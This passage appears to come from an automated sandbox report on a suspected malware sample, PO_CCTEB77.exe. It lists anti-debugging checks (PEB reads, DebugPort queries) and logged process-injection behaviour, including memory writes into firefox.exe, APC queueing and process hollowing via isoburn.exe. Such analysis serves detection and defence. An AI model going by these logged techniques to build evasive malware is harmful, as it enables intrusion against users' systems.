            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E27ED mov eax, dword ptr fs:[00000030h]3_2_017E27ED
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E27ED mov eax, dword ptr fs:[00000030h]3_2_017E27ED
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E27ED mov eax, dword ptr fs:[00000030h]3_2_017E27ED
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183C730 mov eax, dword ptr fs:[00000030h]3_2_0183C730
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CC7C0 mov eax, dword ptr fs:[00000030h]3_2_017CC7C0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802750 mov eax, dword ptr fs:[00000030h]3_2_01802750
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802750 mov eax, dword ptr fs:[00000030h]3_2_01802750
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01844755 mov eax, dword ptr fs:[00000030h]3_2_01844755
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C07AF mov eax, dword ptr fs:[00000030h]3_2_017C07AF
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184E75D mov eax, dword ptr fs:[00000030h]3_2_0184E75D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F2674 mov eax, dword ptr fs:[00000030h]3_2_017F2674
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FA660 mov eax, dword ptr fs:[00000030h]3_2_017FA660
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FA660 mov eax, dword ptr fs:[00000030h]3_2_017FA660
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017DC640 mov eax, dword ptr fs:[00000030h]3_2_017DC640
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C262C mov eax, dword ptr fs:[00000030h]3_2_017C262C
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017DE627 mov eax, dword ptr fs:[00000030h]3_2_017DE627
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F8620 mov eax, dword ptr fs:[00000030h]3_2_017F8620
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F6620 mov eax, dword ptr fs:[00000030h]3_2_017F6620
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183E6F2 mov eax, dword ptr fs:[00000030h]3_2_0183E6F2
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183E6F2 mov eax, dword ptr fs:[00000030h]3_2_0183E6F2
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183E6F2 mov eax, dword ptr fs:[00000030h]3_2_0183E6F2
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183E6F2 mov eax, dword ptr fs:[00000030h]3_2_0183E6F2
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018406F1 mov eax, dword ptr fs:[00000030h]3_2_018406F1
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018406F1 mov eax, dword ptr fs:[00000030h]3_2_018406F1
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D260B mov eax, dword ptr fs:[00000030h]3_2_017D260B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D260B mov eax, dword ptr fs:[00000030h]3_2_017D260B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D260B mov eax, dword ptr fs:[00000030h]3_2_017D260B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D260B mov eax, dword ptr fs:[00000030h]3_2_017D260B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D260B mov eax, dword ptr fs:[00000030h]3_2_017D260B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D260B mov eax, dword ptr fs:[00000030h]3_2_017D260B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D260B mov eax, dword ptr fs:[00000030h]3_2_017D260B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183E609 mov eax, dword ptr fs:[00000030h]3_2_0183E609
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802619 mov eax, dword ptr fs:[00000030h]3_2_01802619
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FA6C7 mov ebx, dword ptr fs:[00000030h]3_2_017FA6C7
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FA6C7 mov eax, dword ptr fs:[00000030h]3_2_017FA6C7
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F66B0 mov eax, dword ptr fs:[00000030h]3_2_017F66B0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FC6A6 mov eax, dword ptr fs:[00000030h]3_2_017FC6A6
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0188866E mov eax, dword ptr fs:[00000030h]3_2_0188866E
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0188866E mov eax, dword ptr fs:[00000030h]3_2_0188866E
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C4690 mov eax, dword ptr fs:[00000030h]3_2_017C4690
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C4690 mov eax, dword ptr fs:[00000030h]3_2_017C4690
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E6962 mov eax, dword ptr fs:[00000030h]3_2_017E6962
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E6962 mov eax, dword ptr fs:[00000030h]3_2_017E6962
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E6962 mov eax, dword ptr fs:[00000030h]3_2_017E6962
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018489B3 mov esi, dword ptr fs:[00000030h]3_2_018489B3
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018489B3 mov eax, dword ptr fs:[00000030h]3_2_018489B3
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018489B3 mov eax, dword ptr fs:[00000030h]3_2_018489B3
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018569C0 mov eax, dword ptr fs:[00000030h]3_2_018569C0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0188A9D3 mov eax, dword ptr fs:[00000030h]3_2_0188A9D3
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017B8918 mov eax, dword ptr fs:[00000030h]3_2_017B8918
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017B8918 mov eax, dword ptr fs:[00000030h]3_2_017B8918
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184E9E0 mov eax, dword ptr fs:[00000030h]3_2_0184E9E0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F29F9 mov eax, dword ptr fs:[00000030h]3_2_017F29F9
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F29F9 mov eax, dword ptr fs:[00000030h]3_2_017F29F9
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183E908 mov eax, dword ptr fs:[00000030h]3_2_0183E908
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183E908 mov eax, dword ptr fs:[00000030h]3_2_0183E908
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184C912 mov eax, dword ptr fs:[00000030h]3_2_0184C912
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CA9D0 mov eax, dword ptr fs:[00000030h]3_2_017CA9D0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CA9D0 mov eax, dword ptr fs:[00000030h]3_2_017CA9D0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CA9D0 mov eax, dword ptr fs:[00000030h]3_2_017CA9D0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CA9D0 mov eax, dword ptr fs:[00000030h]3_2_017CA9D0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CA9D0 mov eax, dword ptr fs:[00000030h]3_2_017CA9D0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CA9D0 mov eax, dword ptr fs:[00000030h]3_2_017CA9D0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184892A mov eax, dword ptr fs:[00000030h]3_2_0184892A
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0185892B mov eax, dword ptr fs:[00000030h]3_2_0185892B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F49D0 mov eax, dword ptr fs:[00000030h]3_2_017F49D0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01840946 mov eax, dword ptr fs:[00000030h]3_2_01840946
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C09AD mov eax, dword ptr fs:[00000030h]3_2_017C09AD
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C09AD mov eax, dword ptr fs:[00000030h]3_2_017C09AD
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D29A0 mov eax, dword ptr fs:[00000030h]3_2_017D29A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0180096E mov eax, dword ptr fs:[00000030h]3_2_0180096E
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0180096E mov edx, dword ptr fs:[00000030h]3_2_0180096E
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0180096E mov eax, dword ptr fs:[00000030h]3_2_0180096E
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184C97C mov eax, dword ptr fs:[00000030h]3_2_0184C97C
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01864978 mov eax, dword ptr fs:[00000030h]3_2_01864978
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01864978 mov eax, dword ptr fs:[00000030h]3_2_01864978
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184C89D mov eax, dword ptr fs:[00000030h]3_2_0184C89D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C4859 mov eax, dword ptr fs:[00000030h]3_2_017C4859
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C4859 mov eax, dword ptr fs:[00000030h]3_2_017C4859
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F0854 mov eax, dword ptr fs:[00000030h]3_2_017F0854
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D2840 mov ecx, dword ptr fs:[00000030h]3_2_017D2840
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E2835 mov eax, dword ptr fs:[00000030h]3_2_017E2835
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E2835 mov eax, dword ptr fs:[00000030h]3_2_017E2835
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E2835 mov eax, dword ptr fs:[00000030h]3_2_017E2835
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E2835 mov ecx, dword ptr fs:[00000030h]3_2_017E2835
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E2835 mov eax, dword ptr fs:[00000030h]3_2_017E2835
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E2835 mov eax, dword ptr fs:[00000030h]3_2_017E2835
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FA830 mov eax, dword ptr fs:[00000030h]3_2_017FA830
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0188A8E4 mov eax, dword ptr fs:[00000030h]3_2_0188A8E4
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FC8F9 mov eax, dword ptr fs:[00000030h]3_2_017FC8F9
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FC8F9 mov eax, dword ptr fs:[00000030h]3_2_017FC8F9
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184C810 mov eax, dword ptr fs:[00000030h]3_2_0184C810
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0186483A mov eax, dword ptr fs:[00000030h]3_2_0186483A
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0186483A mov eax, dword ptr fs:[00000030h]3_2_0186483A
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EE8C0 mov eax, dword ptr fs:[00000030h]3_2_017EE8C0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01856870 mov eax, dword ptr fs:[00000030h]3_2_01856870
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01856870 mov eax, dword ptr fs:[00000030h]3_2_01856870
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184E872 mov eax, dword ptr fs:[00000030h]3_2_0184E872
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184E872 mov eax, dword ptr fs:[00000030h]3_2_0184E872
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C0887 mov eax, dword ptr fs:[00000030h]3_2_017C0887
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017BCB7E mov eax, dword ptr fs:[00000030h]3_2_017BCB7E
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0186EBD0 mov eax, dword ptr fs:[00000030h]3_2_0186EBD0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EEB20 mov eax, dword ptr fs:[00000030h]3_2_017EEB20
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EEB20 mov eax, dword ptr fs:[00000030h]3_2_017EEB20
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184CBF0 mov eax, dword ptr fs:[00000030h]3_2_0184CBF0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EEBFC mov eax, dword ptr fs:[00000030h]3_2_017EEBFC
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C8BF0 mov eax, dword ptr fs:[00000030h]3_2_017C8BF0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C8BF0 mov eax, dword ptr fs:[00000030h]3_2_017C8BF0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C8BF0 mov eax, dword ptr fs:[00000030h]3_2_017C8BF0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183EB1D mov eax, dword ptr fs:[00000030h]3_2_0183EB1D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183EB1D mov eax, dword ptr fs:[00000030h]3_2_0183EB1D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183EB1D mov eax, dword ptr fs:[00000030h]3_2_0183EB1D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183EB1D mov eax, dword ptr fs:[00000030h]3_2_0183EB1D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183EB1D mov eax, dword ptr fs:[00000030h]3_2_0183EB1D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183EB1D mov eax, dword ptr fs:[00000030h]3_2_0183EB1D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183EB1D mov eax, dword ptr fs:[00000030h]3_2_0183EB1D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183EB1D mov eax, dword ptr fs:[00000030h]3_2_0183EB1D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183EB1D mov eax, dword ptr fs:[00000030h]3_2_0183EB1D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01888B28 mov eax, dword ptr fs:[00000030h]3_2_01888B28
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01888B28 mov eax, dword ptr fs:[00000030h]3_2_01888B28
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C0BCD mov eax, dword ptr fs:[00000030h]3_2_017C0BCD
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C0BCD mov eax, dword ptr fs:[00000030h]3_2_017C0BCD
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C0BCD mov eax, dword ptr fs:[00000030h]3_2_017C0BCD
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E0BCB mov eax, dword ptr fs:[00000030h]3_2_017E0BCB
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E0BCB mov eax, dword ptr fs:[00000030h]3_2_017E0BCB
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E0BCB mov eax, dword ptr fs:[00000030h]3_2_017E0BCB
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0BBE mov eax, dword ptr fs:[00000030h]3_2_017D0BBE
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0BBE mov eax, dword ptr fs:[00000030h]3_2_017D0BBE
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01868B42 mov eax, dword ptr fs:[00000030h]3_2_01868B42
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01856B40 mov eax, dword ptr fs:[00000030h]3_2_01856B40
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01856B40 mov eax, dword ptr fs:[00000030h]3_2_01856B40
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0188AB40 mov eax, dword ptr fs:[00000030h]3_2_0188AB40
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01894A80 mov eax, dword ptr fs:[00000030h]3_2_01894A80
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FCA6F mov eax, dword ptr fs:[00000030h]3_2_017FCA6F
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FCA6F mov eax, dword ptr fs:[00000030h]3_2_017FCA6F
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FCA6F mov eax, dword ptr fs:[00000030h]3_2_017FCA6F
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01816AA4 mov eax, dword ptr fs:[00000030h]3_2_01816AA4
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0A5B mov eax, dword ptr fs:[00000030h]3_2_017D0A5B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0A5B mov eax, dword ptr fs:[00000030h]3_2_017D0A5B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C6A50 mov eax, dword ptr fs:[00000030h]3_2_017C6A50
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C6A50 mov eax, dword ptr fs:[00000030h]3_2_017C6A50
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C6A50 mov eax, dword ptr fs:[00000030h]3_2_017C6A50
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C6A50 mov eax, dword ptr fs:[00000030h]3_2_017C6A50
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C6A50 mov eax, dword ptr fs:[00000030h]3_2_017C6A50
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C6A50 mov eax, dword ptr fs:[00000030h]3_2_017C6A50
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C6A50 mov eax, dword ptr fs:[00000030h]3_2_017C6A50
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FCA38 mov eax, dword ptr fs:[00000030h]3_2_017FCA38
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E4A35 mov eax, dword ptr fs:[00000030h]3_2_017E4A35
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E4A35 mov eax, dword ptr fs:[00000030h]3_2_017E4A35
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01816ACC mov eax, dword ptr fs:[00000030h]3_2_01816ACC
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01816ACC mov eax, dword ptr fs:[00000030h]3_2_01816ACC
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01816ACC mov eax, dword ptr fs:[00000030h]3_2_01816ACC
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EEA2E mov eax, dword ptr fs:[00000030h]3_2_017EEA2E
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FCA24 mov eax, dword ptr fs:[00000030h]3_2_017FCA24
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FAAEE mov eax, dword ptr fs:[00000030h]3_2_017FAAEE
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FAAEE mov eax, dword ptr fs:[00000030h]3_2_017FAAEE
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184CA11 mov eax, dword ptr fs:[00000030h]3_2_0184CA11
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C0AD0 mov eax, dword ptr fs:[00000030h]3_2_017C0AD0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F4AD0 mov eax, dword ptr fs:[00000030h]3_2_017F4AD0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F4AD0 mov eax, dword ptr fs:[00000030h]3_2_017F4AD0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C8AA0 mov eax, dword ptr fs:[00000030h]3_2_017C8AA0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe; Process queried: DebugPort
            Source: C:\Windows\SysWOW64\isoburn.exe; Process queried: DebugPort
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe; Code function: 3_2_004173F3 LdrLoadDll
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe; Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\PO_CCTEB77.exe; Section loaded: unknown target: C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe; Section loaded: unknown target: C:\Windows\SysWOW64\isoburn.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\isoburn.exe; Section loaded: unknown target: C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe protection: read write
            Source: C:\Windows\SysWOW64\isoburn.exe; Section loaded: unknown target: C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\isoburn.exe; Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\isoburn.exe; Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\isoburn.exe; Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF79F9E0000
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe; Memory written: C:\Users\user\Desktop\PO_CCTEB77.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\isoburn.exe; Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF79F9E0000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\isoburn.exe; Thread APC queued: target process: C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe; Process created: C:\Users\user\Desktop\PO_CCTEB77.exe C:\Users\user\Desktop\PO_CCTEB77.exe
            Source: C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe; Process created: C:\Windows\SysWOW64\isoburn.exe C:\Windows\SysWOW64\isoburn.exe
            Source: C:\Windows\SysWOW64\isoburn.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
            Source: AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000004.00000000.2078010850.0000000001661000.00000002.00000001.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000004.00000002.4474698783.0000000001661000.00000002.00000001.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000000.2209411834.00000000013F1000.00000002.00000001.00040000.00000000.sdmp; Binary or memory strings: Program Manager, Shell_TrayWnd, Progman, Progmanlock
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe; Queries volume information: C:\Users\user\Desktop\PO_CCTEB77.exe VolumeInformation
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe; Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_CCTEB77.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
